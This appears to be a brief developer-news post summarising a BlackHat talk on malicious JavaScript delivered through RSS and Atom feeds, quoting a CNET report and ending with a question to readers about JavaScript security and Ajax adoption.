At last week's BlackHat security conference, Bob Auger, a security engineer with SPI Dynamics, highlighted the vulnerability of scripts embedded in RSS feeds in a presentation, Zero Day Subscriptions: Using RSS and Atom feeds As Attack Delivery Systems . A white paper on the topic is also available from SPI, Feed Injection in Web 2.0(PDF file). An article on CNET.com, Blog feeds may carry security risk characterized the threat as follows,

Attackers could exploit the problem by setting up a malicious blog and enticing a user to subscribe to the RSS feed. More likely, however, they would add malicious JavaScript to the comments on a trusted blog, Auger said. "A lot of blogs will take user comments and stick them into their own RSS feeds," he said... Also, attackers could send malicious code to mailing lists that offer RSS or Atom feeds and commandeer vulnerable systems that way, Auger said.

A key reason for concern is that many RSS feed readers operate in a non-restricted mode, with full access to the OS. Auger's recommendation to site and blog software authors was to remove scripts from blog texts.

While removing scripts from blogs and forum messages seems reasonable, the recent uptake of JavaScript in Ajax applications means that JavaScript is increasingly becoming an integral part of Web applications. Thus, entirely disabling JavaScript is no longer an option for many users.

To what extent does user concerns about JavaScript security impact your decisions to incorporate Ajax features in your Web applications?